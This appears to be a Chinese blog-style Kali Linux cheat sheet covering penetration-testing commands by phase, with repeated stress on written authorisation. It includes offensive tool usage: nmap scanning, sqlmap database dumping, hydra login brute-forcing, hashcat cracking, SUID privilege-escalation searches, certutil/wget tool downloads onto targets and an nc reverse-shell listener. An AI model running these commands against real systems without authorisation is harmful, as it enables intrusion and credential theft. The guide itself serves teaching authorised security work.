1. 别急着背命令:先搞清楚 Kali 里哪些命令真正高频
1.1 Kali Linux 的定位,决定了它是"命令行为主"的系统
很多人第一次装完 Kali Linux,第一反应是打开图形界面找找"渗透测试按钮"。找一圈发现没有,然后就开始迷茫。其实这事从 Kali 的出身就能解释清楚:它本质上是 Debian 的一个定制发行版,预装了一大堆安全测试工具,但它没有为这些工具做一套统一的图形界面。每个工具要么是纯命令行的,要么是自带的 GUI 界面,彼此之间的参数风格、输出格式、帮助文档都各不一样。
这就带来一个很现实的问题:你想让 Kali Linux 干活,绕不开命令。图形界面能帮你点开工具,但工具真正怎么跑、跑哪些参数、输出怎么解读,全在命令行里。我见过太多新手,装好系统之后只会点鼠标,遇到需要组合多个工具的场景就卡住了。所以这份速查表的第一原则不是"背下来",而是"按使用阶段归档,用的时候能三秒找到"。
顺便提一句,网上搜"kali linux 安装教程""kali linux 官网""kali linux 源"这些的人特别多,说明很多读者还停留在环境搭建阶段。这没问题,但环境搭完之后,真正决定你水平的是命令熟练度,而不是你装了多少工具。
1.2 速查表的正确用法:按阶段归档,而不是按字母排序
我早期做过一件很蠢的事:把所有命令按字母顺序整理成一个大表,A 开头的一堆,S 开头的一堆。结果实战的时候根本查不动,因为你在打点的时候想的是"我现在要扫端口",而不是"我要找一个 n 开头的命令"。
正确的归档方式是按渗透测试流程走。一个完整的授权测试大致会经过这几个阶段:环境确认、信息收集、漏洞探测、漏洞利用、权限提升、后渗透与清理。命令按这些阶段分散归档,查询时先定位阶段,再在阶段里挑命令,效率完全不一样。这也符合人脑的检索习惯——按场景联想,而不是按字符串匹配。
1.3 一份命令速查表的三层结构
我自己的速查表是三层结构。第一层是"万能基础",就是不管做什么阶段都要用的,比如文件操作、文本处理、网络排查;第二层是"阶段专用",比如信息收集阶段的 nmap、目录枚举工具,Web 阶段的 curl、sqlmap;第三层是"救火专用",就是报错时用来排查的命令,比如看进程、看端口、看日志。
三层当中,第一层最容易被忽视,但它其实是使用频率最高的。举个最简单的例子,grep 和 awk 这两个命令,几乎会出现在每一次实战里——因为任何工具的输出你都要过滤和提取。很多人工具参数背得滚瓜烂熟,结果输出几百行数据不知道怎么看,这就是基础没打牢。
提示:速查表不要追求"全",要追求"顺手"。一份两百条但你能立刻定位的清单,价值远高于一份两千条但你找不到的清单。
接下来就按这个思路,从系统与网络层开始往下拆。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. 系统与网络层:所有测试的地基
2.1 先摸清自己在哪台机器上
不管做什么,第一步永远是确认自己的环境。Kali 跑在物理机上、跑在虚拟机里、还是跑在容器里,能用的工具和能力是不一样的。下面这组命令是我开机基本都要过一遍的:
bash复制uname -a # 内核版本、架构、主机名一次看全
cat /etc/os-release # 发行版信息,确认是不是 Kali 以及代号
hostnamectl # 主机名、内核、架构、虚拟化环境
lscpu # CPU 核心数、是否支持虚拟化
free -h # 内存占用,跑内存吃紧的工具前先看一眼
df -h # 磁盘剩余空间,扫描结果日志很占地方
ip -br a # 简版网卡与 IP 列表,比 ifconfig 清爽
ip route # 默认路由,确认出口走哪张网卡
这里有个细节值得说:ip -br a 里的 -br 是 brief(简洁)模式,输出一行一个网卡,比传统 ifconfig 那种多行堆叠清楚得多。现代 Linux 里 ifconfig、netstat、route 这些老命令很多系统已经默认不装了,虽然 Kali 一般会保留,但养成用 ip、ss 系的习惯更稳。
再补一条判断虚拟化环境的技巧,就是看 systemd-detect-virt,它会直接告诉你现在跑在 kvm、vmware、hyperv 还是 bare(物理机)。为什么这个重要?因为虚拟机里的网卡模式和物理机差异很大,网卡混杂模式的设置、无线网卡的可用性都有区别。很多人问"Kali 里怎么扫 WiFi",这里就得说清楚:虚拟机里的无线网卡是通过宿主转发的,一般只能做常规联网,扫描 WiFi 需要把无线网卡(比如支持监听的型号)直通给虚拟机,或者干脆用物理机装 Kali,这不是命令能解决的,是硬件和虚拟化配置的问题。
2.2 网络连通性与配置排查
网络不通的时候,按"从下往上"的顺序排查,能省掉大量时间。链路层看 ARP,网络层看 ping 和路由,传输层看端口连通性。
bash复制ping -c 4 192.168.1.1 # 只发 4 个包,避免无限刷新
arp-scan -l # 扫本网段存活主机,依赖二层可达
arp -n # 查本机 ARP 缓存
ss -tulnp # 所有监听端口 + 进程名,替代 netstat
ss -tnp # 已建立的 TCP 连接及对应进程
traceroute 8.8.8.8 # 逐跳看路径,定位在哪一跳断掉
nc -zv 192.168.1.10 22 # 探单个端口通不通
nc -zv 192.168.1.10 20-25 # 探一个端口区间
ss 那个 -tulnp 我建议直接背下来:t 是 TCP,u 是 UDP,l 是监听状态,n 是不解析域名(快),p 是显示进程(需要权限)。这一条命令顶过去三四条老命令。
再说到一个容易产生歧义的命令:telnet。很多教程用 telnet ip port 来测端口通不通,这确实是经典用法,但要注意 telnet 是明文协议,用它做测试仅适合"连不连得上"的判断,别拿它传敏感数据。现代环境更推荐用 nc 或 curl -v 来替代。
关于 arpspoof,它属于 ARP 层面的中间人测试工具,只在你自己搭建的授权实验环境中使用,用来验证交换网络下的流量可见性。这里必须强调:任何针对非授权目标的流量劫持都是违法的,工具本身中性,用在哪里决定性质。
2.3 软件源与包管理:apt / dpkg 的高频姿势
Kali 是基于 Debian 的,包管理就是 apt 和 dpkg。工具装不上、源太慢、依赖冲突,这几类问题几乎每个新手都会遇到。
bash复制cat /etc/apt/sources.list # 查看当前源配置
sudo apt update # 刷新索引(不升级)
sudo apt full-upgrade # 升级已装包,Kali 建议用 full-upgrade
sudo apt install -y 包名 # 装软件,-y 跳过确认
sudo apt remove 包名 # 卸载但保留配置
sudo apt purge 包名 # 连配置一起删
apt search 关键词 # 不知道包名时先搜
apt show 包名 # 看版本、大小、依赖
dpkg -L 包名 # 看这个包装了哪些文件(找 wordlists 常用)
dpkg -S 文件路径 # 反查文件属于哪个包
dpkg -i xxx.deb # 装本地 deb
sudo apt --fix-broken install # 依赖坏了先修这个
dpkg -L 这条我特别推荐。比如你不知道字典文件放哪,dpkg -L wordlists 一敲,路径全出来。同理,找不到某个工具的配置文件,用 dpkg -S 反查归属,比全盘 find 快得多。
换源这件事,网上搜"kali linux hunt 换源""kali linux 源"的人非常多。核心逻辑就一句话:把 sources.list 里的域名换成你实际访问速度更快的镜像站,然后 apt update 生效。改之前建议先备份:
bash复制sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak
sudo vim /etc/apt/sources.list
这里就用到 vim 了。给不熟 vim 的读者补个最小操作集:按 i 进插入模式,改完按 Esc 退出插入模式,输入 :wq 保存退出,输入 :q! 不保存强退。记住这三个就够了,剩下的慢慢学。
注意:改源之后如果
apt update报签名或 404 错误,第一件事是确认发行版代号和源里的代号一致,第二件事是确认网络能通到那个域名,不要急着重装系统。
3. 信息收集:渗透测试真正的"大头"
3.1 主机发现与端口扫描(nmap)
行业里有个说法,一次测试里信息收集能占到六成以上的时间。这话不夸张。目标是什么系统、开了哪些端口、跑着什么服务、版本是多少,这些信息决定了后面所有动作的方向。nmap 是这个阶段的主力。
bash复制nmap -sn 192.168.1.0/24 # 只做主机发现,不扫端口
nmap -sS -p- -T4 192.168.1.10 # SYN 半开扫描全端口,速度中等
nmap -sS -sV -sC -p 22,80,443 192.168.1.10 # 指定端口 + 版本识别 + 默认脚本
nmap -O 192.168.1.10 # 尝试识别操作系统
nmap -sU --top-ports 50 192.168.1.10 # UDP 扫描,慢,只扫常见端口
nmap -Pn 192.168.1.10 # 跳过主机存活判断,对方禁 ping 时用
nmap -oA scan_result 192.168.1.10 # 三种格式同时输出,留档必备
nmap --script vuln 192.168.1.10 # 跑漏洞类脚本
参数选择背后是有逻辑的。-sS 比 -sT 快,因为它不发完整的三次握手,但需要 root 权限;-T4 是时序模板,数字越大越快也越容易被防护设备发现,内网可以拉到 T4,跨公网我一般用 T3 保守一点;-p- 是扫全部 65535 个端口,比默认只扫 top 1000 慢很多,但很多"偏门"服务恰恰开在高位端口上,实战里值得花这个时间。
-oA 这个输出参数新手最容易忽略。扫描结果一定要落盘,因为后面写报告、复盘、对比多次扫描结果都靠它。我曾经吃过一次亏:扫完没存,第二天要写报告,只能重扫一遍,结果对方防火墙策略变了,数据对不上。
扫描节奏上还有个经验:内网环境可以先 -sn 快速捞一遍存活主机,再对存活主机逐个做详细扫描;跨网段或者目标有防护设备时,把大范围扫描拆成几次小范围,避免触发告警被拉黑。
3.2 目录、子域与服务枚举
服务跑起来之后,接着是找入口。Web 就枚举目录和文件,有域名就枚举子域,有 SMB 就枚举共享。
bash复制# 目录枚举
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt -t 30
dirb http://target /usr/share/wordlists/dirb/common.txt
ffuf -u http://target/FUZZ -w 字典文件 -mc 200,301,302
# 子域枚举
gobuster dns -d example.com -w 子域字典
# SMB 枚举
enum4linux -a 192.168.1.10
smbclient -L //192.168.1.10 -N # 匿名列举共享
smbmap -H 192.168.1.10 # 看共享的读写权限
# 指纹识别
whatweb http://target
nikto -h http://target
字典的选择直接影响枚举效率。Kali 自带好几套字典,/usr/share/wordlists/ 下能找到,dirb、dirbuster、wfuzz 各自的字典风格不同。我的做法是先用 common.txt 这类小字典快速过一遍,拿到结果之后再针对性地用大字典深挖,这样既快又不会一上来就跑几个小时。
ffuf 的 -mc 参数是"只显示哪些状态码",这个设计非常实用。默认情况下它会显示所有响应,包括 404,输出刷屏。加上 -mc 200,301,302 之后,只保留有价值的结果。类似的还有 -fs(过滤响应大小),当目标对不存在的路径返回 200 时,用大小过滤能快速排掉噪声。
服务枚举里还有个坑:enum4linux -a 会跑很多子项,输出很长,遇到响应慢的目标能跑十几分钟。建议先 -U(用户)、-S(共享)单项跑,确认有信息再上 -a。
3.3 DNS 与流量侧信息
域名场景下,DNS 记录能挖出很多"计划外"的信息。
bash复制dig example.com ANY
dig +short MX example.com
dig axfr @ns1.example.com example.com # 尝试区域传送(多数服务器已禁)
dnsrecon -d example.com -t std
dnsenum example.com
whois example.com
区域传送(AXFR)这个技术点值得多说一句。配置不当时,DNS 服务器会允许任何人拉取整份区域文件,等于把内网主机名全盘托出。现在绝大多数服务器都关了这个功能,但在一些老系统、内网 DNS 里仍然偶有遇到,所以还是值得一试。
流量侧的话,tcpdump 是基石:
bash复制sudo tcpdump -i eth0 -nn -w capture.pcap # 抓包存文件
sudo tcpdump -i eth0 -nn port 80 # 只看 80 端口
sudo tcpdump -i eth0 -nn host 192.168.1.10 # 只看某主机
sudo tcpdump -r capture.pcap -nn | head -50 # 读包文件
-nn 的作用是"不解析域名和端口名",输出更快也更干净。抓包文件建议配合 Wireshark 图形化分析,命令行只做粗筛,细节分析还是图形界面舒服。
4. Web 应用测试:命令行的组合拳
4.1 用 curl 和 Burp 打通"请求构造"这一环
Web 测试里,能不能精确控制一个 HTTP 请求,决定了你能测多深。curl 是我的第一选择,因为它参数明确、可脚本化、结果可复现。
bash复制curl -i http://target # 带响应头
curl -I http://target # 只看响应头(HEAD 请求)
curl -X POST -d "a=1&b=2" http://target # 表单 POST
curl -X POST -H "Content-Type: application/json" -d '{"k":"v"}' http://target
curl -b "session=abc" http://target # 带 Cookie
curl -A "自定义UA" http://target # 自定义 User-Agent
curl -L http://target # 跟随重定向
curl -k https://target # 忽略证书校验
curl -o out.html http://target # 输出到文件
curl -v http://target # 完整调试信息
-v 这个参数看起来普通,但它会把请求行、请求头、响应头、TLS 握手过程全打出来。当某个请求行为"不符合预期"时,第一件事就是加 -v,很多时候问题就暴露在某个自动附加的头或者重定向上。
图形化抓包工具是另一条腿。它的价值在于"拦截—修改—重放"这套流程,特别是需要反复微调某个参数的时候,比手写 curl 快得多。我的习惯是:探索阶段用图形工具抓包,确认了攻击面之后,再用 curl 把请求固化下来,方便写脚本和留证据。
这两者之间可以互相转换——抓到的请求可以导出成 curl 命令,curl 命令也能手工改写成各种脚本。掌握这个转换,效率会明显上一个台阶。
4.2 漏扫与指纹识别工具命令
有了请求能力之后,就可以上自动化工具做批量探测。
bash复制nikto -h http://target -o nikto.html -Format html
wpscan --url http://target --enumerate u,vp # WordPress 站点
whatweb -a 3 http://target # 指纹,-a 3 是激进级别
sslscan target:443 # TLS 配置检查
nmap --script http-enum,http-headers -p 80,443 target
wpscan 的 --enumerate 参数里的字母是有讲究的:u 是用户,vp 是易受攻击的插件,vt 是易受攻击的主题。全开(ap,at,u)会非常慢而且容易被封,我的建议是先 --enumerate u 看用户名,再针对性看插件。
指纹识别的价值在于"把攻击面缩小到具体技术栈"。知道对方用 WordPress,就直接上 wpscan;知道对方是 Tomcat,就去试管理后台和已知漏洞;知道是 Java 应用,就多留意反序列化相关的点。盲目对着一堆工具轮流轰,是最低效的做法。
4.3 SQL 注入检测:sqlmap 的常用参数组合
sqlmap 是自动化注入检测里知名度最高的工具。它很强,但也很"吵"——默认配置下会发大量请求,容易触发防护。所以参数怎么配,比工具本身更重要。
bash复制# 基础探测
sqlmap -u "http://target/item?id=1" --batch --dbs
# 指定注入点与库表
sqlmap -u "http://target/item?id=1" -D dbname -T tablename --dump
# 带 Cookie 的请求
sqlmap -u "http://target/item?id=1" --cookie="sid=abc" --level 2 --risk 1
# 从 Burp 保存的请求文件读取
sqlmap -r request.txt -p id --batch
# 指定数据库类型,加快速度
sqlmap -u "http://target/item?id=1" --dbms=mysql --technique=BEU
几个参数背后的逻辑要讲清楚:
--batch是让所有交互式提问都取默认值,适合脚本化跑,但代价是可能错过一些需要人工判断的分支。--level控制测试的"广度"(检测哪些位置),--risk控制"深度"(用多激进的 payload)。默认 level 1、risk 1 最保守。往上调会显著增加请求量和被拦截概率,实战里我一般从默认值起步,确认有戏再逐步调高。--technique指定注入技术,B 是布尔盲注、E 是报错注入、U 是联合查询、S 是堆叠查询、T 是时间盲注。明确知道目标类型时限定技术,能把速度提上来。-r从文件读请求,是最推荐的用法,因为可以把完整的请求头(包括 Cookie、Referer、自定义头)都带上,比在命令行拼接参数准确得多。
注意:这类工具会向目标发送大量请求,目标系统的日志、告警里会留下完整记录。所以务必只在明确授权的范围内使用,并且记录好测试时间窗口,方便事后和运维对账。
5. 口令攻防:哈希与在线服务测试
5.1 哈希识别与离线破解
拿到哈希之后,第一步永远是"识别类型",不同算法要用不同的模式去解。
bash复制hash-identifier # 交互式识别
hashid '哈希字符串' # 命令行识别,支持批量
john --list=formats | head # 看 john 支持哪些格式
john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hash.txt # 看已破解结果
hashcat -m 0 -a 0 hash.txt rockyou.txt # -m 0 是 MD5
hashcat -m 1000 -a 0 hash.txt rockyou.txt # -m 1000 是 NTLM
hashcat -m 1800 -a 0 hash.txt rockyou.txt # -m 1800 是 sha512crypt
hashcat 的 -m 是模式号,这个必须记几个常用的:0 是 MD5,100 是 SHA1,1000 是 NTLM,1800 是 sha512crypt,3200 是 bcrypt。-a 是攻击模式,0 是字典、3 是掩码、6 是字典加掩码混合。攻击模式 3 适合"知道密码格式"的场景,比如你知道内网密码策略是"八位纯数字",那 -a 3 ?d?d?d?d?d?d?d?d 直接穷举,比跑字典快得多。
这里面有个效率观念要建立:不是说字典越大越好。rockyou.txt 有一千多万条,跑一遍要不少时间。实战里先用规则变形(-r 加载规则文件)在小字典上做变换,往往比用超大字典效果更好,因为人设密码的习惯是有规律的——首字母大写、结尾加数字、把 a 换成 @ 这些。
5.2 在线口令测试:hydra 等工具
离线破解是"我有哈希",在线测试是"我要对着服务试"。后者风险高得多,因为会产生大量登录失败日志,而且很多服务有锁定策略。
bash复制hydra -l admin -P pass.txt ssh://192.168.1.10
hydra -L users.txt -P pass.txt ftp://192.168.1.10
hydra -l admin -P pass.txt 192.168.1.10 http-post-form "/login:u=^USER^&p=^PASS^:F=incorrect"
hydra -l admin -P pass.txt -t 4 -w 3 ssh://192.168.1.10
-t 是并行任务数,-w 是等待时间。这两个参数是"效率和安全"的平衡点:调高 -t 快,但容易触发封禁;调低更隐蔽,但慢。内网环境下 -t 4 到 -t 8 比较常见,公网目标我一般压到 -t 1 或用更慢的节奏。
http-post-form 那一条是 Web 表单登录测试,格式是"路径:请求体:失败标志"。失败标志可以用 F=(包含该字符串表示失败)也可以用 S=(包含该字符串表示成功)。这个字符串选取很关键,你要先手动登录一次失败,观察返回内容里哪句话是稳定的失败提示,拿它做标志,不然会出现大量误报。
提示:口令测试前一定要确认目标是否有账户锁定策略。触发锁定导致业务账号被锁,是事故,不是"技术展示"。
6. 提权与后渗透:拿到入口之后
6.1 Linux 本地信息收集命令清单
拿到一个低权限 shell 之后,核心任务是找提权路径。下面这组命令我基本会一次性跑完:
bash复制id # 当前用户和所属组
sudo -l # 能免密执行哪些命令(重点看)
uname -a # 内核版本,用来找内核提权
cat /etc/crontab # 系统级定时任务
ls -la /etc/cron.* # 各周期目录
find / -perm -4000 -type f 2>/dev/null # SUID 文件,提权重灾区
find / -writable -type d 2>/dev/null # 可写目录
getcap -r / 2>/dev/null # 带 capabilities 的文件
ss -tulnp # 本机监听的服务
ps aux # 进程列表,看有什么特权进程
env # 环境变量,可能藏着凭据
cat /etc/passwd | grep -v nologin # 可登录用户
ls -la /home/* # 家目录权限
sudo -l 是第一条要看的。很多人在这里能直接看到"某个命令可以免密 sudo",然后通过该命令的执行能力拿到高权限。find 的 SUID 那条也很关键,SUID 文件是提权题里的老常客,找到不寻常的 SUID 文件之后,去公开的漏洞库查对应版本。
find 的写法要注意:-perm -4000 前面那个短横线表示"至少包含这些权限位",不加横线是精确匹配。2>/dev/null 是把权限不足的报错丢掉,不然全盘搜索会刷出一堆 "Permission denied"。
6.2 Windows 侧必须记住的几组命令
Windows 目标的命令风格完全不同,但高频就那么几组:
cmd复制whoami /all :: 当前用户、组、权限
systeminfo :: 系统补丁、版本,找缺失补丁
net user :: 本机用户列表
net localgroup administrators :: 管理员组成员
net share :: 共享列表
ipconfig /all :: 完整网络配置
netstat -ano :: 端口与进程 PID
tasklist /svc :: 进程与服务对应关系
wmic service get name,displayname,pathname,startmode
reg query HKLM\Software\... :: 查注册表键
补丁信息是我最关注的一块。systeminfo 里会列出已安装的补丁编号,对照公开的提权漏洞信息,缺失哪个补丁就对应哪条路。另外注意 net localgroup administrators 和 net user,这两条能快速摸清"谁是管理员".
顺带提一个偏门但常见的问题:有些读者问 gpedit.msc 打不开。这个通常是系统版本问题——家庭版默认没有组策略编辑器,或者相关文件缺失。日常排查里更建议直接用 reg query、reg add 操作注册表,不依赖图形化的组策略工具。
关于汽车信息安全、车载系统测试这类场景(网上常看到"汽车信息安全渗透测试""车载 adb 命令"这类说法),整体思路和传统主机是一致的:先摸清通信接口,再看有哪些调试通道。车载环境里常见的是通过 ADB 连接调试接口,命令跟安卓调试基本一致(adb devices、adb shell、adb push/pull),但这类测试对授权的要求极高,必须在有明确书面授权的场地和车辆上进行。
6.3 会话维持与文件传输
后渗透阶段反复用到的就是"把文件传进去、把结果传出来".
bash复制# 本机做 HTTP 服务
python3 -m http.server 8000
# 目标机拉文件(Linux)
wget http://192.168.1.5:8000/tool.sh
curl -O http://192.168.1.5:8000/tool.sh
# 目标机拉文件(Windows)
certutil -urlcache -split -f http://192.168.1.5:8000/tool.exe tool.exe
# 监听反弹会话(授权环境)
nc -lvnp 4444
# 文件编码传输,避免二进制被破坏
base64 tool.bin > tool.b64
python3 -m http.server 这条命令几乎是我的默认动作——它不需要任何配置,在有 Python 的机器上一条命令就起了一个文件服务。反过来,目标机上如果没有 wget,优先试试 curl;两个都没有,再考虑用 nc 直连传文件。
base64 那条用来处理"只能传文本"的场景:把二进制编码成文本,传过去再解码还原。这个方法在通过命令行窗口粘贴文件时特别管用,缺点是体积会大三分之一左右。
7. 把效率拉满:别名、历史与脚本化
7.1 别名与函数:把长命令压缩成两个字母
命令玩熟之后,真正拉开差距的是"肌肉记忆"和"自动化". 别名是最简单的一步:
bash复制# 写进 ~/.bashrc
alias ll='ls -alh'
alias nse='nmap -sS -sV -sC'
alias nsall='nmap -sS -p- -T4'
alias listen='ss -tulnp'
改完 source ~/.bashrc 生效。别名的原则是"短、唯一、好记". 我一般用两到三个字母,比如 ll、nse。但要注意别覆盖已有命令,比如把 ls 别名成别的东西,时间久了会把自己搞晕。
复杂一点的逻辑用函数:
bash复制scan() {
nmap -sS -sV -oA "$1_scan" "$1"
echo "结果已保存为 $1_scan.*"
}
这样 scan 192.168.1.10 就完成了扫描加留档。函数比别名灵活,能接收参数、能做流程控制。
7.2 历史、重定向与日志留存
history 是很多人忽视的宝藏:
bash复制history | grep nmap # 找以前用过的扫描命令
history -c # 清空当前会话历史
!123 # 重新执行第 123 条历史命令
Ctrl+R # 反向搜索历史
Ctrl+R 这个快捷键强烈推荐练熟,输入关键词就能从历史里捞出以前的完整命令,比翻上下箭头快几十倍。
输出重定向是另一块基本功:
bash复制命令 > out.txt # 覆盖
命令 >> out.txt # 追加
命令 2>&1 | tee out.txt # 标准错误合并 + 屏幕与文件同时输出
命令 | grep 关键词 # 过滤
命令 | awk '{print $2}' # 取第二列
命令 | sort -u # 去重排序
tee 这个命令我用的频率非常高。它的好处是"既能在屏幕上看到实时输出,又能同时存一份到文件里". 很多扫描命令跑很久,如果只重定向到文件,你就看不到进度;只用屏幕输出又不留档。| tee 两全其美。
7.3 vim 与 git:配置和工具的日常操作
vim 前面提了最小操作集,这里补几个常用进阶动作:/关键词 是向下搜索,n 跳到下一个匹配,dd 删一行,yy 复制一行,p 粘贴,gg 跳到文件头,G 跳到文件尾,:set nu 显示行号。掌握这些,编辑配置文件就够用了。
git 在日常里主要用来拉工具和脚本:
bash复制git clone 仓库地址
git pull # 更新本地仓库
git log --oneline -10 # 看最近提交
git status # 看当前改动
git checkout -b 新分支名 # 建并切分支
为什么渗透测试人员要会 git?因为大量开源工具和脚本是通过仓库分发的,很多工具更新频繁,git pull 能保持最新。另外,把常用的小脚本、字典、payload 清单放到自己的私有仓库里,换机器的时候 git clone 一下就恢复环境,比拷 U 盘省事得多。这里要提醒一句:私有仓库务必设为私有,别把测试数据、目标信息往公开仓库推。
8. 踩坑现场:常见报错与排查技巧
8.1 报错速查表
| 报错 / 现象 | 常见原因 | 排查方向 |
|---|---|---|
apt update 404 / 签名错误 |
源地址与发行版代号不匹配 | 核对 sources.list 与 /etc/os-release |
Permission denied |
权限不足 | 换 sudo 或检查文件所有者 |
command not found |
没装或不在 PATH | apt install,查 echo $PATH |
| 端口扫描全是 filtered | 防火墙拦截 | 加 -Pn,换 -sT,降低速度 |
Address already in use |
端口被占 | ss -tulnp 找占用进程 |
no space left on device |
磁盘满 | df -h、du -sh * 逐层找大文件 |
Connection refused |
服务没监听或被拒 | 先确认对方端口是否开放 |
Connection timed out |
网络不通或被丢弃 | ping、traceroute 定位 |
| 工具报编码错误 | 输出含非 UTF-8 字符 | 管道加 iconv 或重定向到文件再看 |
几个高频的再说细一点。
"端口扫描全是 filtered"这件事最容易被误判。有人一看全是 filtered 就以为目标没开服务,其实很可能是自己的探测包被防火墙丢了。这时候加 -Pn(跳过存活判断)、换成 -sT(用完整连接,更"像正常流量")、或者把 -T4 降到 -T2,往往能拿到结果。扫描策略本身就是一门对抗学问。
"no space left on device" 在 Kali 里出现得比想象中频繁,因为扫描日志、抓包文件、字典很容易把磁盘塞满。定位方法是从根目录开始一层层 du -sh:
bash复制du -sh /* 2>/dev/null | sort -h
sort -h 是按人类可读的大小排序,最大的排最后,一眼就能看出是哪个目录膨胀了。清理由此产生的临时文件和旧日志即可,注意别误删系统目录。
8.2 几条血泪心得
第一条心得:命令跑之前先想清楚"它会发多少请求". 很多新手直接对着一整个网段跑全端口扫描加漏洞脚本,结果要么把自己的网络拖垮,要么被目标封掉。稳妥做法是先小范围试跑,确认节奏合适再扩大。
第二条:所有输出都留档。我现在的习惯是每个项目建一个目录,扫描结果、抓包文件、命令历史全部放进去,文件名带时间戳。这个习惯在写报告的时候能省下大量回忆成本。
第三条:别迷信工具输出。任何自动化工具都会误报和漏报。工具的结论只是"线索",必须人工验证。我见过有人拿着扫描器报出来的一个"高危"直接写进报告,结果对方一问详情就露馅了,因为根本没验证过。
第四条:环境快照。做任何有风险的测试之前,先给虚拟机打个快照。玩坏了回滚,几秒钟的事。这个习惯能让你敢于尝试各种边界操作,学习速度会明显加快。
9. 合规边界与学习路径
9.1 什么能做,什么绝对不能做
这块必须放在最后,但必须说清楚。渗透测试本质上是一份"授权下的安全工作",核心前提是书面授权。没有授权,对任何非自有系统的扫描、探测、登录尝试,性质都会变。所以我的建议很直接:
- 只在自己搭建的实验环境里练习。虚拟机里起几个有已知漏洞的靶机,自己对自己打,这是最安全也最有效的学习方式。
- 拿到授权时,明确测试范围、时间窗口、允许使用的方法、禁止触碰的系统。这些要白纸黑字写清楚。
- 测试过程中的所有操作要留痕,包括命令、时间、结果。这既是职业素养,也是保护自己的方式。
- 发现真实漏洞时,按约定流程上报,不要扩大测试范围,不要下载、留存任何业务数据。
很多人关心职业路径和认证,网上搜"渗透测试工程师学习""注册渗透测试工程师"的人不少。我的看法是:证书是敲门砖,但真正决定你能不能做事的是动手能力。与其纠结某张证怎么考,不如先把一个靶机从头打到尾,把每一步的命令和思路记录下来,这份记录本身就是最好的简历素材。
9.2 从命令到能力:一条可执行的学习路线
如果你现在处于"命令能看懂但不会用"的阶段,我建议按这个顺序推:
第一阶段,把本文第 2 章和第 7 章的内容吃透。也就是说,系统命令、网络排查、别名和历史,这些是地基。每天花二十分钟,不用工具,就是敲命令,把 ss、ip、find、grep、awk、tee 这些练到不用想。
第二阶段,找一个内网靶机,完整走一遍流程:扫主机、扫端口、枚举服务、找入口、提权。全程手动记录命令,不借助任何"一键脚本". 这个过程会非常慢,可能几个小时才拿下,但收获是成倍的。
第三阶段,把常用命令整理成你自己的速查表,按阶段归档,配上你的实际输出示例。注意是"你的"速查表,别人的清单可以参考,但只有自己整理过的才记得住。
关于"AI 辅助测试"这个方向(网上有不少"ai 渗透测试""ai 渗透测试本地部署"的讨论),我的看法是:它可以帮你解释命令、生成脚本片段、整理输出,但它不能替你判断"这个动作是否在授权范围内",也不能替你承担操作后果。把 AI 当成一个随时在线的助教是合适的,把它当成"自动打点机器"就危险了。
最后分享一个我自己的小做法:把速查表里的命令分三档——"闭眼能敲""看着能用""偶尔查询". 每次实战之后更新一次,把新学的命令从第三档往第二档挪。一年下来,能闭眼敲的命令会多出一大截,那时候你回头看这份清单,会发现真正高频的其实就那么几十条,剩下的都是围绕它们做参数变换而已。
